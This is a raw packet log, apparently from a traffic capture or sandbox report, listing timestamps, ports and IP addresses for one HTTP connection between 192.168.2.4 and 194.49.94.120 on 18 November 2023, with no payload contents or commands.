Nov 18, 2023 10:02:37.124355078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124372959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124389887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124392986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124407053 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124414921 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124423981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124440908 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124456882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124469042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124473095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124494076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124505043 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124511003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124526978 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124526978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124543905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124560118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124569893 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124577045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124594927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124608994 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124614954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124634027 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124634981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124651909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124670029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124671936 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124686956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124705076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124711990 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124722004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124735117 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124737978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124774933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124809980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124830008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124850035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124857903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124866962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124887943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124895096 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124905109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124922991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124933004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124939919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124957085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124967098 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.124974012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.124998093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125000000 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.125015020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125034094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125050068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125060081 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.125068903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125096083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.125102997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125118971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125122070 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.125135899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125153065 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125154972 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.125169992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125194073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.125217915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125288963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125308037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125329018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125333071 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.125346899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125365019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125369072 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.125395060 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.125902891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125925064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.125961065 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.125993967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126012087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126030922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126036882 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.126065016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126075983 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.126084089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126102924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126121044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126122952 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.126138926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126180887 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.126265049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126313925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.126317024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126771927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126791954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.126818895 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.126943111 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135036945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135093927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135130882 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135252953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135272026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135289907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135294914 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135308981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135329008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135333061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135348082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135368109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135373116 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135385036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135401011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135413885 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135417938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135435104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135443926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135452032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135468960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135494947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135513067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135514975 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135529995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135545969 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135561943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135571003 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135579109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135596991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135606050 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135615110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135622978 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135622978 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135632038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135648012 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135662079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135665894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135704994 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135768890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135787964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135803938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135821104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135829926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135838032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135854006 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135858059 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135874033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135895014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135895967 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135911942 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135929108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135930061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135946035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135955095 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.135963917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135979891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.135997057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136004925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136013985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136032104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136044979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136048079 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136065006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136070013 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136082888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136090994 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136100054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136116028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136127949 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136132956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136148930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136162996 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136164904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136184931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136192083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136202097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136220932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136235952 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136238098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136255026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136271000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136274099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136287928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136310101 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136312008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136329889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136346102 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136348009 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136363029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136373043 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136379004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136395931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136408091 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136410952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136429071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136442900 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136447906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136465073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136470079 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136482000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136498928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136516094 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136518002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136537075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136540890 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136554003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136570930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136578083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136589050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136605978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136624098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.136631012 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.136668921 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.137744904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.137765884 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.137789965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.137795925 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.137810946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.137833118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.137837887 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.137850046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.137870073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.137892008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.139569998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.139765024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.139782906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.139810085 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.140497923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.140520096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.140537977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.140544891 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.140553951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.140573978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.140579939 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.140594006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.140610933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.140615940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.140630007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.140650988 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.141388893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.141412020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.141455889 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.142293930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142314911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142343998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142349005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.142398119 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.142411947 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142431974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142451048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142469883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142482042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.142487049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142519951 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.142605066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142621994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142638922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142651081 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.142657042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142673969 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142690897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.142694950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142713070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142714024 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.142729044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142748117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142759085 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.142766953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.142792940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143069029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143090010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143106937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143122911 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143143892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143160105 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143163919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143182039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143212080 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143491030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143510103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143558025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143569946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143591881 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143610001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143626928 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143635035 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143659115 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143682957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143701077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143719912 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143727064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143762112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143776894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143794060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143811941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143830061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143847942 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143851995 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143867970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143894911 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143904924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143918991 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143923044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143942118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143961906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.143965006 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.143981934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144001961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144018888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144035101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144047022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144048929 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144066095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144078016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144083023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144102097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144108057 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144119024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144144058 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144165039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144182920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144198895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144207954 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144217014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144234896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144242048 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144252062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144269943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144285917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144299030 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144303083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144320011 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144392014 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144443989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144462109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144478083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144499063 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144516945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144525051 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144532919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144546986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.144550085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.144566059 CET	80	49744	194.49.94.120	192.168.2.4
